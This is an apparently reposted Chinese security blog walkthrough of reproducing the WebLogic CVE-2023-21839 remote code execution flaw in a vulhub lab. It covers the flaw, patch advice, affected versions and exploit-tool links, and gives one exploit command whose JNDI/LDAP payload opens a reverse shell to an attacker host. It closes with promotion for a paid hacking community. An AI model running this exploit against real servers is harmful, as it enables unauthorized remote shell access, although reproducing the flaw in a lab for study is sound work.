Weblogic-CVE-2023-21839-远程代码执行复现(排坑)
2023-3-2 21:17:13 Author: 渗透安全团队(查看原文) 阅读量:35 收藏

漏洞阐述

WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。1月18日,Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),该漏洞的CVSSv3评分为7.5,可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。

解决建议

1、安装Oracle WebLogic Server最新安全补丁:

https://www.oracle.com/security-alerts/cpujan2023.html

2、关闭T3和iiop协议端口,操作方法参考:

https://help.aliyun.com/noticelist/articleid/1060577901.html

影响版本

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

环境搭建

这里推荐使用docker + vulhub 简单粗暴

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2020-14882

这里使用docker在vps上搭建完成后,打开地址http://xx.xx.xx:7001

image-20230301155808571

漏洞复现

先下载利用工具

https://github.com/WhiteHSBG/JNDIExploit
https://github.com/4ra1n/CVE-2023-21839

然后在vps上使用JNDIExp开启ldap协议服务,这里注意 1389跟3456端口开放,然后java最好为低版本,我使用17版本未复现成功,8版本成功复现


同时开启端口监听

在本机使用CVE-2023-21839工具发起exp攻击


main.exe -ip xx.xx.xx.xx -port 7001 -ldap ldap://xx.xx.xx.xx:1389/Basic/ReverseShell/xx.xx.xx.xx/10086

攻击成功


收到shell

image


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247499124&idx=2&sn=e0da4b39397dc91c72473c5142871538&chksm=c17600dbf60189cd1752cd2ce8605a5cde3db3b37f9844a1960e729a7e17c43796491a544b65#rd
如有侵权请联系:admin#unsafe.sh